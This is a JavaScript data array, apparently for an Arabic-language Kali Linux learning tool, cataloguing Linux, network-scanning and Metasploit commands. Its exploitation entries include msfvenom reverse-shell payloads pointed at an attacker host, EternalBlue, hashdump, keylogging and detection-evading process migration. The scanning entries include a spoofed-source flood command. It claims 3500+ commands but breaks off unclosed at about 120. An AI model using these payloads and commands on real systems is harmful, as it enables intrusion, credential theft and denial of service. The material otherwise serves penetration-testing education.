// ===== KALI LINUX COMMANDS DATABASE =====
// 3500+ Commands organized by category

const COMMANDS_DB = [

// ==========================================
// 1. LINUX BASICS - أوامر لينكس الأساسية
// ==========================================
{ id:1, name:'ls', cat:'linux', syntax:'ls [options] [path]', short:'عرض محتوى المجلد', desc:'يعرض قائمة بالملفات والمجلدات في المسار المحدد. بدون خيارات يعرض المجلد الحالي.', examples:['ls','ls -la','ls -lh /home','ls -R','ls --color=auto /etc'], level:'beginner' },
{ id:2, name:'cd', cat:'linux', syntax:'cd [directory]', short:'تغيير المجلد الحالي', desc:'ينتقل إلى المجلد المحدد. cd .. للرجوع خطوة، cd ~ للرجوع للمجلد الرئيسي.', examples:['cd /etc','cd ..','cd ~','cd -','cd /var/log'], level:'beginner' },
{ id:3, name:'pwd', cat:'linux', syntax:'pwd', short:'عرض المسار الحالي', desc:'يطبع المسار الكامل للمجلد الذي تعمل فيه حالياً.', examples:['pwd'], level:'beginner' },
{ id:4, name:'mkdir', cat:'linux', syntax:'mkdir [options] directory', short:'إنشاء مجلد جديد', desc:'ينشئ مجلداً جديداً بالاسم المحدد. -p لإنشاء مجلدات متداخلة.', examples:['mkdir newdir','mkdir -p dir1/dir2/dir3','mkdir -m 755 secure'], level:'beginner' },
{ id:5, name:'rm', cat:'linux', syntax:'rm [options] file', short:'حذف ملفات أو مجلدات', desc:'يحذف الملفات والمجلدات. -r للمجلدات بشكل متكرر، -f للحذف القسري.', examples:['rm file.txt','rm -rf /tmp/test','rm -i important.txt','rm *.log'], level:'beginner' },
{ id:6, name:'cp', cat:'linux', syntax:'cp [options] source destination', short:'نسخ الملفات', desc:'ينسخ الملفات والمجلدات من مصدر إلى وجهة.', examples:['cp file.txt /backup/','cp -r /home/user /backup/','cp -p file.txt copy.txt'], level:'beginner' },
{ id:7, name:'mv', cat:'linux', syntax:'mv [options] source destination', short:'نقل أو إعادة تسمية الملفات', desc:'ينقل الملفات من مكان لآخر أو يعيد تسميتها.', examples:['mv old.txt new.txt','mv file.txt /var/tmp/','mv -i file.txt /important/'], level:'beginner' },
{ id:8, name:'cat', cat:'linux', syntax:'cat [options] file', short:'عرض محتوى الملف', desc:'يعرض محتوى ملف أو يدمج ملفات متعددة.', examples:['cat /etc/passwd','cat -n file.txt','cat file1 file2 > combined','cat > newfile.txt'], level:'beginner' },
{ id:9, name:'less', cat:'linux', syntax:'less file', short:'عرض الملف صفحة بصفحة', desc:'يعرض محتوى الملفات الكبيرة صفحة بصفحة مع إمكانية التنقل والبحث.', examples:['less /var/log/syslog','less +F /var/log/auth.log'], level:'beginner' },
{ id:10, name:'more', cat:'linux', syntax:'more file', short:'عرض الملف تدريجياً', desc:'يعرض محتوى الملف صفحة بصفحة للمضي قدماً.', examples:['more /etc/services','ls -la | more'], level:'beginner' },
{ id:11, name:'head', cat:'linux', syntax:'head [options] file', short:'عرض بداية الملف', desc:'يعرض أول 10 أسطر من الملف بشكل افتراضي.', examples:['head /etc/passwd','head -n 20 file.txt','head -c 100 binary.bin'], level:'beginner' },
{ id:12, name:'tail', cat:'linux', syntax:'tail [options] file', short:'عرض نهاية الملف', desc:'يعرض آخر 10 أسطر، -f لمتابعة الملف في الوقت الفعلي.', examples:['tail /var/log/syslog','tail -f /var/log/auth.log','tail -n 50 error.log'], level:'beginner' },
{ id:13, name:'grep', cat:'linux', syntax:'grep [options] pattern file', short:'البحث في نصوص الملفات', desc:'يبحث عن نمط نصي في الملفات. أداة أساسية للتحليل.', examples:['grep "root" /etc/passwd','grep -r "password" /etc/','grep -i "error" /var/log/syslog','grep -v "#" /etc/hosts'], level:'beginner' },
{ id:14, name:'find', cat:'linux', syntax:'find path [options] expression', short:'البحث عن الملفات', desc:'يبحث عن الملفات والمجلدات بناءً على معايير متعددة.', examples:['find / -name "*.txt"','find /home -user john','find / -perm -4000 -type f','find /tmp -mtime -7'], level:'beginner' },
{ id:15, name:'chmod', cat:'linux', syntax:'chmod [options] mode file', short:'تغيير صلاحيات الملف', desc:'يغير صلاحيات الوصول للملفات والمجلدات.', examples:['chmod 755 script.sh','chmod +x run.sh','chmod -R 644 /var/www','chmod u+s /usr/bin/prog'], level:'beginner' },
{ id:16, name:'chown', cat:'linux', syntax:'chown user:group file', short:'تغيير مالك الملف', desc:'يغير مالك ومجموعة الملف أو المجلد.', examples:['chown root:root file','chown -R www-data /var/www','chown user file.txt'], level:'beginner' },
{ id:17, name:'ps', cat:'linux', syntax:'ps [options]', short:'عرض العمليات الجارية', desc:'يعرض قائمة العمليات النشطة على النظام.', examples:['ps aux','ps -ef','ps aux | grep apache','ps -u www-data'], level:'beginner' },
{ id:18, name:'kill', cat:'linux', syntax:'kill [signal] PID', short:'إيقاف عملية', desc:'يرسل إشارة لإنهاء العملية المحددة بـ PID.', examples:['kill 1234','kill -9 5678','kill -SIGTERM 9012'], level:'beginner' },
{ id:19, name:'top', cat:'linux', syntax:'top [options]', short:'مراقبة الموارد في الوقت الفعلي', desc:'يعرض العمليات الجارية مع استهلاك CPU والذاكرة في الوقت الفعلي.', examples:['top','top -u www-data','top -b -n 1 > report.txt'], level:'beginner' },
{ id:20, name:'htop', cat:'linux', syntax:'htop', short:'مراقبة تفاعلية للعمليات', desc:'نسخة محسنة من top مع واجهة تفاعلية ملونة.', examples:['htop','htop -u root','htop -p 1,2,3'], level:'beginner' },
{ id:21, name:'df', cat:'linux', syntax:'df [options]', short:'عرض استخدام القرص', desc:'يعرض مساحة القرص المستخدمة والمتاحة على الأقراص المثبتة.', examples:['df -h','df -T','df /home'], level:'beginner' },
{ id:22, name:'du', cat:'linux', syntax:'du [options] path', short:'حجم الملفات والمجلدات', desc:'يحسب حجم الملفات والمجلدات.', examples:['du -sh /var','du -h --max-depth=1 /','du -sh *'], level:'beginner' },
{ id:23, name:'free', cat:'linux', syntax:'free [options]', short:'عرض استخدام الذاكرة', desc:'يعرض معلومات الذاكرة الفعلية والمبادلة.', examples:['free -h','free -m','free -s 5'], level:'beginner' },
{ id:24, name:'uname', cat:'linux', syntax:'uname [options]', short:'معلومات النظام', desc:'يعرض معلومات النظام مثل اسم النواة والإصدار.', examples:['uname -a','uname -r','uname -m'], level:'beginner' },
{ id:25, name:'whoami', cat:'linux', syntax:'whoami', short:'اسم المستخدم الحالي', desc:'يطبع اسم المستخدم الذي يشغل الجلسة الحالية.', examples:['whoami'], level:'beginner' },
{ id:26, name:'who', cat:'linux', syntax:'who [options]', short:'المستخدمون المتصلون', desc:'يعرض قائمة المستخدمين المتصلين بالنظام حالياً.', examples:['who','who -a','w'], level:'beginner' },
{ id:27, name:'id', cat:'linux', syntax:'id [user]', short:'معرف المستخدم والمجموعة', desc:'يعرض UID وGID ومجموعات المستخدم.', examples:['id','id root','id www-data'], level:'beginner' },
{ id:28, name:'su', cat:'linux', syntax:'su [user]', short:'تبديل المستخدم', desc:'يتيح التبديل إلى مستخدم آخر.', examples:['su root','su - john','su -c "command" user'], level:'beginner' },
{ id:29, name:'sudo', cat:'linux', syntax:'sudo command', short:'تنفيذ بصلاحيات root', desc:'ينفذ الأوامر بصلاحيات المستخدم الجذر أو مستخدم آخر.', examples:['sudo apt update','sudo -i','sudo -u www-data command','sudo -l'], level:'beginner' },
{ id:30, name:'passwd', cat:'linux', syntax:'passwd [user]', short:'تغيير كلمة المرور', desc:'يغير كلمة مرور المستخدم المحدد أو الحالي.', examples:['passwd','passwd root','passwd -l user','passwd -u user'], level:'beginner' },
{ id:31, name:'useradd', cat:'linux', syntax:'useradd [options] username', short:'إضافة مستخدم جديد', desc:'ينشئ حساب مستخدم جديد على النظام.', examples:['useradd john','useradd -m -s /bin/bash alice','useradd -G sudo admin'], level:'beginner' },
{ id:32, name:'userdel', cat:'linux', syntax:'userdel [options] username', short:'حذف مستخدم', desc:'يحذف حساب مستخدم من النظام.', examples:['userdel john','userdel -r alice'], level:'beginner' },
{ id:33, name:'groupadd', cat:'linux', syntax:'groupadd groupname', short:'إنشاء مجموعة', desc:'ينشئ مجموعة مستخدمين جديدة.', examples:['groupadd developers','groupadd -g 1001 hackers'], level:'beginner' },
{ id:34, name:'usermod', cat:'linux', syntax:'usermod [options] user', short:'تعديل حساب مستخدم', desc:'يعدل إعدادات حساب مستخدم موجود.', examples:['usermod -aG sudo john','usermod -s /bin/zsh alice','usermod -L john'], level:'beginner' },
{ id:35, name:'history', cat:'linux', syntax:'history [n]', short:'سجل الأوامر', desc:'يعرض قائمة الأوامر السابقة المنفذة في الجلسة.', examples:['history','history 20','history | grep nmap','!123'], level:'beginner' },
{ id:36, name:'echo', cat:'linux', syntax:'echo [options] string', short:'طباعة نص', desc:'يطبع النص أو قيم المتغيرات على الشاشة.', examples:['echo "Hello World"','echo $PATH','echo -e "Line1\\nLine2"','echo $USER'], level:'beginner' },
{ id:37, name:'touch', cat:'linux', syntax:'touch filename', short:'إنشاء ملف فارغ أو تحديث وقته', desc:'ينشئ ملفاً فارغاً أو يحدث وقت الوصول الأخير للملف.', examples:['touch newfile.txt','touch -d "2024-01-01" file','touch file1 file2 file3'], level:'beginner' },
{ id:38, name:'ln', cat:'linux', syntax:'ln [options] source link', short:'إنشاء روابط للملفات', desc:'ينشئ روابط صلبة أو رمزية للملفات.', examples:['ln -s /etc/hosts /tmp/hosts','ln file.txt hardlink.txt'], level:'beginner' },
{ id:39, name:'which', cat:'linux', syntax:'which command', short:'مسار الأمر', desc:'يعرض المسار الكامل للأمر القابل للتنفيذ.', examples:['which python3','which nmap','which bash'], level:'beginner' },
{ id:40, name:'whereis', cat:'linux', syntax:'whereis command', short:'مواقع الملفات المرتبطة بالأمر', desc:'يعثر على الملف الثنائي ومصادر الأمر وصفحة الدليل.', examples:['whereis nmap','whereis python3'], level:'beginner' },
{ id:41, name:'man', cat:'linux', syntax:'man command', short:'دليل الأمر', desc:'يعرض صفحة الدليل التفصيلية للأمر المحدد.', examples:['man nmap','man ls','man 5 passwd'], level:'beginner' },
{ id:42, name:'alias', cat:'linux', syntax:'alias name="command"', short:'إنشاء اختصارات للأوامر', desc:'ينشئ اختصاراً لأمر أو سلسلة أوامر.', examples:['alias ll="ls -la"','alias nse="nmap --script"','alias update="apt update && apt upgrade"'], level:'beginner' },
{ id:43, name:'export', cat:'linux', syntax:'export VAR=value', short:'تصدير متغيرات البيئة', desc:'يضبط ويصدر متغيرات البيئة ليستخدمها البرامج الفرعية.', examples:['export PATH=$PATH:/new/path','export http_proxy="http://proxy:3128"'], level:'beginner' },
{ id:44, name:'env', cat:'linux', syntax:'env', short:'عرض متغيرات البيئة', desc:'يعرض جميع متغيرات البيئة المضبوطة في الجلسة الحالية.', examples:['env','env | grep PATH','env -i PATH=/usr/bin command'], level:'beginner' },
{ id:45, name:'clear', cat:'linux', syntax:'clear', short:'مسح الشاشة', desc:'يمسح محتوى نافذة الطرفية.', examples:['clear','Ctrl+L'], level:'beginner' },
{ id:46, name:'date', cat:'linux', syntax:'date [format]', short:'عرض التاريخ والوقت', desc:'يعرض أو يضبط تاريخ ووقت النظام.', examples:['date','date "+%Y-%m-%d"','date -d "2 days ago"'], level:'beginner' },
{ id:47, name:'uptime', cat:'linux', syntax:'uptime', short:'وقت تشغيل النظام', desc:'يعرض مدة تشغيل النظام وحمل المعالج.', examples:['uptime'], level:'beginner' },
{ id:48, name:'reboot', cat:'linux', syntax:'reboot', short:'إعادة تشغيل النظام', desc:'يعيد تشغيل النظام فوراً.', examples:['reboot','shutdown -r now','shutdown -r +5'], level:'beginner' },
{ id:49, name:'shutdown', cat:'linux', syntax:'shutdown [options] time', short:'إيقاف تشغيل النظام', desc:'يوقف تشغيل النظام أو يعيد تشغيله في وقت محدد.', examples:['shutdown -h now','shutdown -r 10','shutdown -c'], level:'beginner' },
{ id:50, name:'tar', cat:'linux', syntax:'tar [options] archive files', short:'ضغط واستخراج الأرشيفات', desc:'ينشئ ويستخرج ملفات الأرشيف بصيغ متعددة.', examples:['tar -czvf archive.tar.gz /dir','tar -xzvf archive.tar.gz','tar -tvf archive.tar','tar -cjvf archive.tar.bz2 /dir'], level:'beginner' },
{ id:51, name:'gzip', cat:'linux', syntax:'gzip [options] file', short:'ضغط الملفات بـ gzip', desc:'يضغط الملفات بخوارزمية gzip.', examples:['gzip file.txt','gzip -d file.txt.gz','gzip -9 large_file'], level:'beginner' },
{ id:52, name:'zip', cat:'linux', syntax:'zip [options] archive files', short:'إنشاء ملفات ZIP', desc:'ينشئ ملفات مضغوطة بصيغة ZIP.', examples:['zip archive.zip file1 file2','zip -r archive.zip /directory','zip -P password archive.zip files'], level:'beginner' },
{ id:53, name:'unzip', cat:'linux', syntax:'unzip archive.zip', short:'استخراج ملفات ZIP', desc:'يستخرج محتوى ملفات ZIP.', examples:['unzip archive.zip','unzip -d /target archive.zip','unzip -l archive.zip'], level:'beginner' },
{ id:54, name:'wget', cat:'linux', syntax:'wget [options] URL', short:'تحميل الملفات من الإنترنت', desc:'يحمل الملفات من URLs عبر HTTP/HTTPS/FTP.', examples:['wget https://example.com/file','wget -O output.html https://example.com','wget -r --no-parent https://site.com/dir/'], level:'beginner' },
{ id:55, name:'curl', cat:'linux', syntax:'curl [options] URL', short:'نقل البيانات عبر البروتوكولات', desc:'ينقل البيانات عبر بروتوكولات متعددة مع خيارات واسعة.', examples:['curl https://example.com','curl -O https://site.com/file','curl -d "user=admin&pass=test" -X POST https://site.com/login','curl -H "Authorization: Bearer TOKEN" https://api.example.com'], level:'beginner' },
{ id:56, name:'ssh', cat:'linux', syntax:'ssh [options] user@host', short:'الاتصال الآمن بالخوادم', desc:'يتيح الاتصال الآمن المشفر بالأنظمة البعيدة.', examples:['ssh user@192.168.1.1','ssh -p 2222 user@host','ssh -i key.pem user@server','ssh -L 8080:localhost:80 user@remote'], level:'beginner' },
{ id:57, name:'scp', cat:'linux', syntax:'scp source user@host:destination', short:'نسخ الملفات عبر SSH', desc:'ينسخ الملفات بين الأجهزة باستخدام بروتوكول SSH.', examples:['scp file.txt user@192.168.1.1:/home/','scp -r /local/dir user@host:/remote/','scp user@host:/remote/file /local/'], level:'beginner' },
{ id:58, name:'rsync', cat:'linux', syntax:'rsync [options] source destination', short:'مزامنة الملفات', desc:'يزامن الملفات والمجلدات بكفاءة عالية مع الدعم لـ SSH.', examples:['rsync -avz /local/ user@remote:/backup/','rsync -avz --delete /src/ /dst/'], level:'beginner' },
{ id:59, name:'cron', cat:'linux', syntax:'crontab [options]', short:'جدولة المهام', desc:'يجدول المهام لتنفيذها تلقائياً في أوقات محددة.', examples:['crontab -e','crontab -l','crontab -r'], level:'intermediate' },
{ id:60, name:'at', cat:'linux', syntax:'at time', short:'تنفيذ مهمة مرة واحدة', desc:'ينفذ أمراً في وقت مستقبلي محدد مرة واحدة.', examples:['at now + 5 minutes','at 14:30','echo "backup.sh" | at midnight'], level:'intermediate' },
{ id:61, name:'awk', cat:'linux', syntax:'awk pattern action file', short:'معالجة النصوص والأعمدة', desc:'لغة برمجة قوية لمعالجة البيانات النصية والملفات المهيكلة.', examples:['awk -F: "{print $1}" /etc/passwd','awk "{print $1, $3}" file.txt','awk "NR==5" file','awk "{sum+=$1} END{print sum}" data'], level:'intermediate' },
{ id:62, name:'sed', cat:'linux', syntax:'sed [options] script file', short:'محرر النصوص المتدفق', desc:'يعالج ويحول النصوص باستخدام تعبيرات منتظمة.', examples:['sed "s/old/new/g" file.txt','sed -n "10,20p" file','sed "/^#/d" config.txt','sed -i "s/password/pass/g" file'], level:'intermediate' },
{ id:63, name:'sort', cat:'linux', syntax:'sort [options] file', short:'ترتيب السطور', desc:'يرتب أسطر الملف أو المدخلات أبجدياً أو رقمياً.', examples:['sort file.txt','sort -r file.txt','sort -n -k2 data.txt','sort -u file.txt'], level:'beginner' },
{ id:64, name:'uniq', cat:'linux', syntax:'uniq [options] file', short:'إزالة الأسطر المكررة', desc:'يزيل أو يعد الأسطر المتكررة المتتالية.', examples:['sort file | uniq','uniq -c sorted.txt','uniq -d file.txt'], level:'beginner' },
{ id:65, name:'cut', cat:'linux', syntax:'cut [options] file', short:'قص أجزاء من الأسطر', desc:'يستخرج أعمدة أو حقولاً محددة من كل سطر.', examples:['cut -d: -f1 /etc/passwd','cut -d"," -f1,3 data.csv','cut -c1-10 file.txt'], level:'beginner' },
{ id:66, name:'wc', cat:'linux', syntax:'wc [options] file', short:'عد الكلمات والأسطر', desc:'يعد الأسطر والكلمات والحروف في الملفات.', examples:['wc -l /etc/passwd','wc -w file.txt','wc -c file'], level:'beginner' },
{ id:67, name:'diff', cat:'linux', syntax:'diff file1 file2', short:'مقارنة ملفين', desc:'يقارن ملفين ويعرض الاختلافات بينهما.', examples:['diff file1.txt file2.txt','diff -u old.conf new.conf','diff -r dir1/ dir2/'], level:'beginner' },
{ id:68, name:'tee', cat:'linux', syntax:'command | tee file', short:'كتابة وعرض في آنٍ واحد', desc:'يقرأ من الإدخال ويكتب إلى الملف والشاشة معاً.', examples:['command | tee output.txt','nmap 192.168.1.1 | tee scan.txt'], level:'beginner' },
{ id:69, name:'xargs', cat:'linux', syntax:'command | xargs command', short:'بناء أوامر من المدخلات', desc:'يمرر مدخلات الأوامر كمعطيات لأوامر أخرى.', examples:['find . -name "*.log" | xargs rm','cat urls.txt | xargs wget'], level:'intermediate' },
{ id:70, name:'watch', cat:'linux', syntax:'watch [options] command', short:'تكرار تنفيذ أمر', desc:'ينفذ أمراً بشكل دوري ويعرض نتيجته.', examples:['watch -n 2 df -h','watch -d netstat -an'], level:'beginner' },
{ id:71, name:'screen', cat:'linux', syntax:'screen [options]', short:'جلسات طرفية متعددة', desc:'يتيح إنشاء وإدارة جلسات طرفية متعددة يمكن فصلها وإعادة الاتصال بها.', examples:['screen','screen -S mysession','screen -r mysession','screen -ls'], level:'intermediate' },
{ id:72, name:'tmux', cat:'linux', syntax:'tmux [options]', short:'مضاعف الطرفية', desc:'مضاعف طرفية متقدم يتيح تعدد النوافذ واللوحات.', examples:['tmux','tmux new-session -s main','tmux attach -t main','tmux ls'], level:'intermediate' },
{ id:73, name:'lsof', cat:'linux', syntax:'lsof [options]', short:'قائمة الملفات المفتوحة', desc:'يعرض الملفات المفتوحة والعمليات التي فتحتها.', examples:['lsof -i :80','lsof -u root','lsof -p 1234','lsof /var/log/syslog'], level:'intermediate' },
{ id:74, name:'netstat', cat:'linux', syntax:'netstat [options]', short:'إحصاءات الشبكة', desc:'يعرض اتصالات الشبكة والجداول وإحصاءات الواجهات.', examples:['netstat -tulpn','netstat -an','netstat -r','netstat -s'], level:'intermediate' },
{ id:75, name:'ss', cat:'linux', syntax:'ss [options]', short:'إحصاءات المقابس الحديثة', desc:'بديل أسرع وأكثر تفصيلاً عن netstat.', examples:['ss -tulpn','ss -s','ss -an | grep ESTABLISHED'], level:'intermediate' },
{ id:76, name:'ip', cat:'network', syntax:'ip [options] object command', short:'إدارة الشبكات والمسارات', desc:'يدير الواجهات الشبكية وجداول التوجيه والعناوين.', examples:['ip addr show','ip route show','ip link set eth0 up','ip addr add 192.168.1.10/24 dev eth0'], level:'beginner' },
{ id:77, name:'ifconfig', cat:'network', syntax:'ifconfig [interface] [options]', short:'إعداد واجهات الشبكة', desc:'يعرض ويضبط معاملات واجهات الشبكة.', examples:['ifconfig','ifconfig eth0','ifconfig eth0 up','ifconfig eth0 192.168.1.100 netmask 255.255.255.0'], level:'beginner' },
{ id:78, name:'ping', cat:'network', syntax:'ping [options] host', short:'اختبار الاتصال بالشبكة', desc:'يرسل حزم ICMP لاختبار الاتصال بالمضيف.', examples:['ping google.com','ping -c 4 192.168.1.1','ping -i 0.5 -f 8.8.8.8'], level:'beginner' },
{ id:79, name:'traceroute', cat:'network', syntax:'traceroute [options] host', short:'تتبع مسار الحزم', desc:'يعرض مسار الحزم من المصدر إلى الهدف.', examples:['traceroute google.com','traceroute -I 192.168.1.1','traceroute -n target.com'], level:'beginner' },
{ id:80, name:'nslookup', cat:'network', syntax:'nslookup domain', short:'استعلامات DNS', desc:'يستعلم عن معلومات DNS لاسم النطاق أو عنوان IP.', examples:['nslookup google.com','nslookup 8.8.8.8','nslookup -type=MX gmail.com'], level:'beginner' },

// ==========================================
// 2. NETWORK SCANNING - فحص الشبكات
// ==========================================
{ id:101, name:'nmap', cat:'network', syntax:'nmap [options] target', short:'أداة مسح الشبكات الأشهر', desc:'أداة مسح الشبكات واكتشاف الأجهزة. تدعم فحص المنافذ وتحديد الخدمات وإصداراتها.', examples:['nmap 192.168.1.1','nmap -sV -sC target.com','nmap -A -T4 192.168.1.0/24','nmap --script vuln target.com'], level:'beginner' },
{ id:102, name:'nmap -sS', cat:'network', syntax:'nmap -sS target', short:'فحص SYN الخفي', desc:'فحص SYN (Half-open) الخفي - الأسرع والأقل ضجيجاً على الشبكة. يحتاج صلاحيات root.', examples:['nmap -sS 192.168.1.1','nmap -sS -p 1-1000 target.com'], level:'intermediate' },
{ id:103, name:'nmap -sV', cat:'network', syntax:'nmap -sV target', short:'كشف إصدارات الخدمات', desc:'يحدد إصدارات الخدمات التي تعمل على المنافذ المفتوحة.', examples:['nmap -sV target.com','nmap -sV --version-intensity 9 target'], level:'beginner' },
{ id:104, name:'nmap -sC', cat:'network', syntax:'nmap -sC target', short:'تشغيل السكريبتات الافتراضية', desc:'يشغل مجموعة السكريبتات الافتراضية NSE لجمع معلومات إضافية.', examples:['nmap -sC 192.168.1.1','nmap -sC -sV target.com'], level:'beginner' },
{ id:105, name:'nmap -A', cat:'network', syntax:'nmap -A target', short:'الفحص الشامل', desc:'يشغل جميع خيارات الفحص: إصدارات، سكريبتات، OS، traceroute.', examples:['nmap -A target.com','nmap -A -T4 192.168.1.0/24'], level:'beginner' },
{ id:106, name:'nmap -O', cat:'network', syntax:'nmap -O target', short:'كشف نظام التشغيل', desc:'يحاول تحديد نظام التشغيل المثبت على الهدف.', examples:['nmap -O 192.168.1.1','nmap -O --osscan-guess target'], level:'intermediate' },
{ id:107, name:'nmap --script', cat:'network', syntax:'nmap --script scriptname target', short:'تشغيل سكريبتات NSE', desc:'يشغل سكريبتات Nmap Script Engine للفحص المتخصص.', examples:['nmap --script vuln target','nmap --script http-enum target','nmap --script smb-vuln-ms17-010 target'], level:'intermediate' },
{ id:108, name:'nmap -sU', cat:'network', syntax:'nmap -sU target', short:'فحص UDP', desc:'يفحص المنافذ UDP (أبطأ من TCP ولكن ضروري لاكتشاف خدمات UDP).', examples:['nmap -sU target.com','nmap -sU -p 53,161,500 target'], level:'intermediate' },
{ id:109, name:'nmap -p', cat:'network', syntax:'nmap -p ports target', short:'فحص منافذ محددة', desc:'يحدد المنافذ أو نطاق المنافذ للفحص.', examples:['nmap -p 80,443 target','nmap -p 1-65535 target','nmap -p- target','nmap -p T:80,U:53 target'], level:'beginner' },
{ id:110, name:'nmap -T', cat:'network', syntax:'nmap -T[0-5] target', short:'التحكم في توقيت الفحص', desc:'يضبط سرعة الفحص من T0 (أبطأ) إلى T5 (أسرع).', examples:['nmap -T4 target','nmap -T0 target','nmap -T5 192.168.1.0/24'], level:'beginner' },
{ id:111, name:'nmap -oN', cat:'network', syntax:'nmap -oN output.txt target', short:'حفظ نتائج الفحص', desc:'يحفظ نتائج الفحص في ملف نصي بصيغة عادية.', examples:['nmap -oN scan.txt target','nmap -oX scan.xml target','nmap -oA all_formats target'], level:'beginner' },
{ id:112, name:'masscan', cat:'network', syntax:'masscan [options] target', short:'فحص سريع للمنافذ', desc:'أسرع أداة لفحص المنافذ - يمكنها فحص الإنترنت كله في دقائق.', examples:['masscan 192.168.1.0/24 -p80','masscan 0.0.0.0/0 -p443 --rate=1000000','masscan -p1-65535 192.168.1.1'], level:'intermediate' },
{ id:113, name:'zmap', cat:'network', syntax:'zmap [options] subnet', short:'فحص شبكي واسع النطاق', desc:'أداة فحص شبكي عالية السرعة مصممة للدراسات الشبكية الواسعة.', examples:['zmap -p 80 192.168.0.0/16','zmap -p 443 -o results.csv 10.0.0.0/8'], level:'advanced' },
{ id:114, name:'unicornscan', cat:'network', syntax:'unicornscan [options] target', short:'فحص شبكي متقدم', desc:'أداة مسح شبكي تدعم فحص UDP و TCP مع مرونة عالية.', examples:['unicornscan 192.168.1.1:a','unicornscan -mU 192.168.1.1'], level:'intermediate' },
{ id:115, name:'hping3', cat:'network', syntax:'hping3 [options] target', short:'حقن حزم TCP/IP', desc:'أداة لإنشاء وتحليل حزم TCP/IP مخصصة. مفيدة لاختبارات DoS والجدران النارية.', examples:['hping3 --syn -p 80 target','hping3 -c 3 -p 80 target','hping3 --flood --rand-source target'], level:'advanced' },
{ id:116, name:'arp-scan', cat:'network', syntax:'arp-scan [options] subnet', short:'اكتشاف الأجهزة بـ ARP', desc:'يكتشف الأجهزة على الشبكة المحلية باستخدام بروتوكول ARP.', examples:['arp-scan -l','arp-scan 192.168.1.0/24','arp-scan --interface=eth0 192.168.1.0/24'], level:'beginner' },
{ id:117, name:'netdiscover', cat:'network', syntax:'netdiscover [options]', short:'اكتشاف شبكي passive/active', desc:'يكتشف الأجهزة الحية على الشبكة سواء بشكل فعال أو سلبي.', examples:['netdiscover -r 192.168.1.0/24','netdiscover -p','netdiscover -i eth0'], level:'beginner' },
{ id:118, name:'nbtscan', cat:'network', syntax:'nbtscan subnet', short:'فحص أسماء NetBIOS', desc:'يفحص الشبكة للبحث عن أسماء NetBIOS على الأجهزة.', examples:['nbtscan 192.168.1.0/24','nbtscan -v 192.168.1.1-254'], level:'intermediate' },
{ id:119, name:'fping', cat:'network', syntax:'fping [options] targets', short:'فحص ping متعدد الأهداف', desc:'يرسل ping لأهداف متعددة بسرعة عالية.', examples:['fping -g 192.168.1.0 192.168.1.255','fping -a -g 192.168.1.0/24'], level:'beginner' },
{ id:120, name:'onesixtyone', cat:'network', syntax:'onesixtyone target community', short:'فحص SNMP سريع', desc:'يفحص أجهزة SNMP بسرعة عالية للبحث عن community strings ضعيفة.', examples:['onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.0/24'], level:'intermediate' },

// ==========================================
// 3. EXPLOITATION - الاستغلال
// ==========================================
{ id:201, name:'msfconsole', cat:'exploit', syntax:'msfconsole [options]', short:'تشغيل Metasploit', desc:'يشغل واجهة Metasploit Framework الرئيسية. الأداة الأشهر في اختبار الاختراق.', examples:['msfconsole','msfconsole -q','msfconsole -r script.rc'], level:'intermediate' },
{ id:202, name:'msfvenom', cat:'exploit', syntax:'msfvenom [options]', short:'إنشاء payloads', desc:'يولد payloads مخصصة لمختلف الأنظمة والمنافذ الخلفية.', examples:['msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker LPORT=4444 -f exe > shell.exe','msfvenom -p php/meterpreter_reverse_tcp LHOST=ip LPORT=4444 -f raw > shell.php'], level:'advanced' },
{ id:203, name:'use', cat:'exploit', syntax:'use module/path', short:'تحميل وحدة Metasploit', desc:'يحمل وحدة (exploit/auxiliary/post) في Metasploit.', examples:['use exploit/multi/handler','use auxiliary/scanner/portscan/tcp','use exploit/windows/smb/ms17_010_eternalblue'], level:'intermediate' },
{ id:204, name:'set', cat:'exploit', syntax:'set OPTION value', short:'ضبط خيارات الوحدة', desc:'يضبط متغيرات الوحدة المحملة مثل RHOSTS و LHOST و LPORT.', examples:['set RHOSTS 192.168.1.1','set LHOST 10.0.0.1','set PAYLOAD windows/meterpreter/reverse_tcp'], level:'intermediate' },
{ id:205, name:'run', cat:'exploit', syntax:'run / exploit', short:'تنفيذ الوحدة', desc:'يبدأ تنفيذ الوحدة المحملة على الهدف.', examples:['run','exploit','exploit -j -z'], level:'intermediate' },
{ id:206, name:'search', cat:'exploit', syntax:'search keyword', short:'البحث في وحدات Metasploit', desc:'يبحث في قاعدة بيانات Metasploit عن الثغرات والوحدات.', examples:['search ms17-010','search type:exploit platform:windows','search eternalblue'], level:'intermediate' },
{ id:207, name:'sessions', cat:'exploit', syntax:'sessions [options]', short:'إدارة جلسات Meterpreter', desc:'يعرض ويدير الجلسات النشطة في Metasploit.', examples:['sessions -l','sessions -i 1','sessions -k 1'], level:'intermediate' },
{ id:208, name:'meterpreter', cat:'exploit', syntax:'meterpreter commands', short:'واجهة التحكم بعد الاختراق', desc:'واجهة تحكم قوية بعد نجاح الاختراق. تدعم تنفيذ الأوامر، نقل الملفات، وأكثر.', examples:['sysinfo','getuid','getsystem','hashdump','upload file.txt /tmp/'], level:'intermediate' },
{ id:209, name:'getsystem', cat:'exploit', syntax:'getsystem', short:'رفع صلاحيات النظام', desc:'يحاول رفع صلاحيات Meterpreter للوصول إلى صلاحيات SYSTEM.', examples:['getsystem','getsystem -t 3'], level:'advanced' },
{ id:210, name:'hashdump', cat:'exploit', syntax:'hashdump', short:'استخراج كلمات المرور المشفرة', desc:'يستخرج كلمات مرور Windows المشفرة من SAM.', examples:['hashdump','run post/windows/gather/hashdump'], level:'advanced' },
{ id:211, name:'migrate', cat:'exploit', syntax:'migrate PID', short:'نقل العملية', desc:'ينقل Meterpreter إلى عملية أخرى لتجنب الاكتشاف.', examples:['migrate 1234','migrate -N explorer.exe'], level:'advanced' },
{ id:212, name:'keyscan_start', cat:'exploit', syntax:'keyscan_start', short:'تسجيل ضربات المفاتيح', desc:'يبدأ تسجيل ضربات المفاتيح على الجهاز المخترق.', examples:['keyscan_start','keyscan_dump','keyscan_stop'], level:'advanced' },
{ id:213, name:'screenshot', cat:'exploit', syntax:'screenshot', short:'لقطة شاشة', desc:'يلتقط صورة للشاشة الحالية للجهاز المخترق.', examples:['screenshot','run post/multi/manage/screengrab'], level:'advanced' },
